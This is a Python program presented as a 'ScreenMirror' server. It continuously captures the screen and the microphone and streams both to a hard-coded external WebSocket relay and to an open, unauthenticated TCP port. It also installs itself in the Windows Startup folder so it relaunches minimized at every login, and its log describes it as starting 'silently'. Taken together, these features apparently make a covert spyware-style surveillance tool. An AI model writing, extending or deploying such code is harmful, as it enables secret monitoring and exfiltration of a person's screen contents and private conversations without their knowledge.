import os
import sys
import time
import json
import socket
import struct
import threading
import mss
import numpy as np
import cv2
import websocket

try:
    import pyaudio
except ImportError:
    pyaudio = None

# Base settings
PORT = 9999
FPS = 30
QUALITY = 90
MONITOR = 1
AUDIO_RATE = 44100  # High-quality voice

CONFIG_FILE = os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), 'config_global.txt')

# State variables
active_ws = None
ws_lock = threading.Lock()

local_client_conn = None
local_client_lock = threading.Lock()

def log(msg):
    log_path = os.path.join(os.path.dirname(os.path.abspath(sys.argv[0])), 'global-server.log')
    timestamp = time.strftime('%Y-%m-%d %H:%M:%S')
    try:
        with open(log_path, 'a', encoding='utf-8') as f:
            f.write(f"[{timestamp}] {msg}\n")
    except:
        pass
    try:
        print(msg, flush=True)
    except:
        pass

def get_app_path():
    if getattr(sys, 'frozen', False):
        return sys.executable
    return os.path.abspath(__file__)

def ensure_startup_entry():
    """Per-user Windows Startup folder mein autostart batch file configure karein."""
    if os.name != 'nt':
        return

    try:
        appdata = os.environ.get('APPDATA')
        if not appdata:
            return

        startup_dir = os.path.join(appdata, 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
        os.makedirs(startup_dir, exist_ok=True)

        target_path = get_app_path()
        startup_bat = os.path.join(startup_dir, 'ScreenMirrorGlobalServer.bat')

        launch_line = f'"{target_path}"' if getattr(sys, 'frozen', False) else f'"{sys.executable}" "{target_path}"'

        content = (
            '@echo off\r\n'
            'rem Auto-generated by ScreenMirror global-server\r\n'
            f'start "" /min {launch_line}\r\n'
        )

        current = None
        if os.path.exists(startup_bat):
            try:
                with open(startup_bat, 'r', encoding='utf-8') as f:
                    current = f.read()
            except:
                pass

        if current != content:
            with open(startup_bat, 'w', encoding='utf-8', newline='\r\n') as f:
                f.write(content)
            log(f"Startup entry registered successfully at: {startup_bat}")
    except Exception as e:
        log(f"Startup registration failed: {e}")

def load_relay_url():
    """config_global.txt se relay URL load karein ya default use karein."""
    if os.path.exists(CONFIG_FILE):
        try:
            with open(CONFIG_FILE, 'r', encoding='utf-8') as f:
                url = f.read().strip()
                if url:
                    return url
        except Exception as e:
            log(f"Failed to read config file: {e}")

    fallback = "wss://stremer-production.up.railway.app"
    try:
        with open(CONFIG_FILE, 'w', encoding='utf-8') as f:
            f.write(fallback)
    except Exception as e:
        log(f"Failed to write default config URL: {e}")
    return fallback

def send_to_global(prefix, payload, blocking=True):
    """Global WebSocket client ko bin payload bhejta hai."""
    global active_ws
    if active_ws:
        acquired = ws_lock.acquire(blocking=blocking)
        if not acquired:
            return
        try:
            active_ws.send_binary(prefix + payload)
        except Exception as e:
            log(f"Global send failed: {e}")
            try:
                active_ws.close()
            except:
                pass
            active_ws = None
        finally:
            ws_lock.release()

def send_to_local(prefix, payload, blocking=True):
    """Local TCP client ko custom structured stream package bhejta hai."""
    global local_client_conn
    if local_client_conn:
        acquired = local_client_lock.acquire(blocking=blocking)
        if not acquired:
            return
        try:
            # Local package style: [4 bytes size] [1 byte prefix] [payload]
            total_len = len(payload) + 1
            header = struct.pack('>I', total_len)
            local_client_conn.sendall(header + prefix + payload)
        except Exception as e:
            log(f"Local client send failed: {e}")
            try:
                local_client_conn.close()
            except:
                pass
            local_client_conn = None
        finally:
            local_client_lock.release()

def global_ws_reconnect_loop():
    """Relay server ke sath continuous websocket connection manage karta hai."""
    global active_ws
    while True:
        relay_url = load_relay_url()
        # Ensure correct producer path endpoint
        producer_url = relay_url.rstrip('/')
        if not producer_url.endswith('/producer'):
            producer_url += '/producer'

        log(f"Attempting to connect to global relay: {producer_url}...")
        try:
            ws = websocket.create_connection(producer_url, timeout=10)
            ws.send(json.dumps({
                'role': 'producer',
                'hostname': socket.gethostname(),
                'device_id': socket.gethostname(),
                'connected_at': time.strftime('%Y-%m-%d %H:%M:%S')
            }))
            with ws_lock:
                active_ws = ws
            log("Connected to Global Relay server successfully.")
            
            # Recv blocking loop to handle connection drop detection
            while True:
                # Connection open rakhne ke liye ping checks trigger honge
                status = ws.recv()
                if not status:
                    break
        except Exception as e:
            log(f"Global connection error/drop: {e}")
        finally:
            with ws_lock:
                active_ws = None
            log("Global connection dropped. Retrying in 5 seconds...")
            time.sleep(5)

def local_tcp_accept_loop():
    """Local network ke liye TCP Port 9999 par listener chalata hai."""
    global local_client_conn
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    
    try:
        server.bind(('0.0.0.0', PORT))
        server.listen(1)
        log(f"Local LAN TCP server active on port {PORT}...")
    except Exception as e:
        log(f"Failed to bind Local LAN port {PORT}: {e}")
        sys.exit(1)

    while True:
        try:
            conn, addr = server.accept()
            conn.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
            log(f"Local LAN viewer client connected from: {addr[0]}")
            
            with local_client_lock:
                if local_client_conn:
                    try:
                        local_client_conn.close()
                    except:
                        pass
                local_client_conn = conn
        except Exception as e:
            log(f"Local LAN accept loop error: {e}")
            time.sleep(1)

def audio_capture_loop():
    """Microphone voice record karta hai aur dono targets ko stream karta hai."""
    if pyaudio is None:
        log("PyAudio was not found on this system. Audio streaming is disabled.")
        return

    p = pyaudio.PyAudio()
    audio_stream = None
    try:
        audio_stream = p.open(
            format=pyaudio.paInt16,
            channels=1,
            rate=AUDIO_RATE,
            input=True,
            frames_per_buffer=1024
        )
        log(f"Audio record engine active at {AUDIO_RATE}Hz quality.")
    except Exception as e:
        log(f"Microphone recording stream start failed: {e}")
        p.terminate()
        return

    try:
        while True:
            # Microphone voice segment capture karein
            audio_data = audio_stream.read(1024, exception_on_overflow=False)
            if audio_data:
                send_to_global(b'a', audio_data)
                send_to_local(b'a', audio_data)
    except Exception as e:
        log(f"Audio streaming error: {e}")
    finally:
        try:
            if audio_stream:
                audio_stream.stop_stream()
                audio_stream.close()
        except:
            pass
        p.terminate()

def screen_capture_loop():
    """Screen captures record karta hai aur stream karta hai."""
    frame_time = 1.0 / FPS
    log(f"Screen mirror stream active at {FPS} FPS.")

    with mss.mss() as sct:
        monitor = sct.monitors[MONITOR]
        while True:
            t_start = time.time()
            try:
                # Capture frame
                img = np.array(sct.grab(monitor))
                img = cv2.cvtColor(img, cv2.COLOR_BGRA2BGR)

                # JPEG encode
                _, buf = cv2.imencode('.jpg', img, [cv2.IMWRITE_JPEG_QUALITY, QUALITY])
                data = buf.tobytes()

                # Stream out
                send_to_global(b'v', data, blocking=False)
                send_to_local(b'v', data, blocking=False)
            except Exception as e:
                log(f"Screen capture loop error: {e}")

            # Match target FPS
            elapsed = time.time() - t_start
            sleep_time = frame_time - elapsed
            if sleep_time > 0:
                time.sleep(sleep_time)

if __name__ == '__main__':
    log("ScreenMirror Global & Local Server starting silently...")
    ensure_startup_entry()

    # Start independent worker threads
    threading.Thread(target=global_ws_reconnect_loop, daemon=True).start()
    threading.Thread(target=local_tcp_accept_loop, daemon=True).start()
    threading.Thread(target=audio_capture_loop, daemon=True).start()

    # Main thread drives screen capture loop
    screen_capture_loop()
